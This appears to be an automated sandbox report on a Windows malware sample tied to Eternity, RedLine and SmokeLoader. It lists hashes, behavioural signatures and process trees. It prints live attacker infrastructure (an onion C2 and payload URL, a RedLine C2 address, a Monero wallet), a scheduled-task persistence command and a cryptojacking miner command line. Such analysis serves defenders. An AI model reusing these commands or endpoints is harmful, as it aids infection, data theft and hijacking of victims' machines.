Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04/09/2022, 08:45
Static task
static1
Behavioral task
behavioral1
Sample
3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
Resource
win10v2004-20220901-en
General
-
Target
3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe
-
Size
290KB
-
MD5
55eb02184d72de2ac95eecbb59b13e4c
-
SHA1
7aab5d8e68baa28308eb765e27f1994d0f5796b4
-
SHA256
3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a
-
SHA512
15a29cd782032b6533f5f19863507e763762bb0c3504fec8cc5879e5008d3872eefb90b51ff9eebf4fe2bb85133f0cc110ee63d68c65d6068a56b330c3afdff9
-
SSDEEP
3072:Io8b6DOdeGw1voLP7yIJ8p2tijs9YFd1aUiLcI0Mv4J:I6oy3oIjDFd1aR
Malware Config
Extracted
eternity
http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion
45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8
-
payload_urls
http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet/shared/xmrig.exe
Extracted
redline
installs-49
94.140.112.157:29329
-
auth_value
f137ab12b29192785aff1f9a524f0090
Signatures
-
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral2/memory/3068-133-0x0000000002E00000-0x0000000002E09000-memory.dmp family_smokeloader -
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x0003000000022da6-197.dat xmrig behavioral2/files/0x0003000000022da6-198.dat xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 4868 6542.exe 1492 Miner.exe 884 installs49.exe 344 Miner.exe 1788 Miner.exe 5092 Admin_IYMUGYHL.exe 3500 Miner.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 6542.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Miner.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Miner.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2592 4868 WerFault.exe 78 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4020 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 520 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3068 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe 3068 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found 2056 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2056 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3068 3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeDebugPrivilege 4868 6542.exe Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeDebugPrivilege 344 Miner.exe Token: SeDebugPrivilege 884 installs49.exe Token: SeLockMemoryPrivilege 5092 Admin_IYMUGYHL.exe Token: SeLockMemoryPrivilege 5092 Admin_IYMUGYHL.exe Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found Token: SeShutdownPrivilege 2056 Process not Found Token: SeCreatePagefilePrivilege 2056 Process not Found -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2056 wrote to memory of 4868 2056 Process not Found 78 PID 2056 wrote to memory of 4868 2056 Process not Found 78 PID 2056 wrote to memory of 4868 2056 Process not Found 78 PID 4868 wrote to memory of 1492 4868 6542.exe 79 PID 4868 wrote to memory of 1492 4868 6542.exe 79 PID 4868 wrote to memory of 1492 4868 6542.exe 79 PID 1492 wrote to memory of 4160 1492 Miner.exe 81 PID 1492 wrote to memory of 4160 1492 Miner.exe 81 PID 1492 wrote to memory of 4160 1492 Miner.exe 81 PID 4160 wrote to memory of 2344 4160 cmd.exe 83 PID 4160 wrote to memory of 2344 4160 cmd.exe 83 PID 4160 wrote to memory of 2344 4160 cmd.exe 83 PID 4160 wrote to memory of 520 4160 cmd.exe 84 PID 4160 wrote to memory of 520 4160 cmd.exe 84 PID 4160 wrote to memory of 520 4160 cmd.exe 84 PID 4868 wrote to memory of 884 4868 6542.exe 85 PID 4868 wrote to memory of 884 4868 6542.exe 85 PID 4868 wrote to memory of 884 4868 6542.exe 85 PID 4160 wrote to memory of 4020 4160 cmd.exe 89 PID 4160 wrote to memory of 4020 4160 cmd.exe 89 PID 4160 wrote to memory of 4020 4160 cmd.exe 89 PID 4160 wrote to memory of 344 4160 cmd.exe 90 PID 4160 wrote to memory of 344 4160 cmd.exe 90 PID 4160 wrote to memory of 344 4160 cmd.exe 90 PID 344 wrote to memory of 5092 344 Miner.exe 92 PID 344 wrote to memory of 5092 344 Miner.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe"C:\Users\Admin\AppData\Local\Temp\3b59592dcd363e939110c500f86d2b2fa9e9eb53403e3f9c321eec47055ef20a.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3068
-
C:\Users\Admin\AppData\Local\Temp\6542.exeC:\Users\Admin\AppData\Local\Temp\6542.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\Miner.exe"C:\Users\Admin\AppData\Local\Temp\Miner.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:2344
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4020
-
-
C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe"C:\Users\Admin\AppData\Local\Temp\Admin_IYMUGYHL.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_IYMUGYHL -p --max-cpu-usage=40 --donate-level=15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\installs49.exe"C:\Users\Admin\AppData\Local\Temp\installs49.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 12562⤵
- Program crash
PID:2592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4868 -ip 48681⤵PID:4612
-
C:\Users\Admin\AppData\Local\ServiceHub\Miner.exeC:\Users\Admin\AppData\Local\ServiceHub\Miner.exe1⤵
- Executes dropped EXE
PID:1788
-
C:\Users\Admin\AppData\Local\ServiceHub\Miner.exeC:\Users\Admin\AppData\Local\ServiceHub\Miner.exe1⤵
- Executes dropped EXE
PID:3500
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
612B
MD581ab0e59097e03cb04c32378024d6628
SHA1cc2a7a335f905e787906b6a0820acfbd4c5d0ed2
SHA256704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533
SHA5123dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
436KB
MD5f1ae38e744808d4df42eed53c896323a
SHA10d0edac38a4e1a1c073aa99fc1009230a05deb74
SHA2569508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA512b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6
-
Filesize
436KB
MD5f1ae38e744808d4df42eed53c896323a
SHA10d0edac38a4e1a1c073aa99fc1009230a05deb74
SHA2569508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA512b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6
-
Filesize
4.7MB
MD584cbc72865b542c646bd89bb9430e7d1
SHA1c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8
-
Filesize
4.7MB
MD584cbc72865b542c646bd89bb9430e7d1
SHA1c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
16KB
MD5d1b22ce6e0f11c1b8283a85d9f902bbd
SHA18593038e651f856367d094b4541dd7cbffb8e7a3
SHA25695aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed
-
Filesize
88KB
MD524f5400ea175ed8a981c5f4184587ac4
SHA124b9e12675b4e5f389eb01d6c423e123909d02d9
SHA2563be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA5124d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669
-
Filesize
88KB
MD524f5400ea175ed8a981c5f4184587ac4
SHA124b9e12675b4e5f389eb01d6c423e123909d02d9
SHA2563be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA5124d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669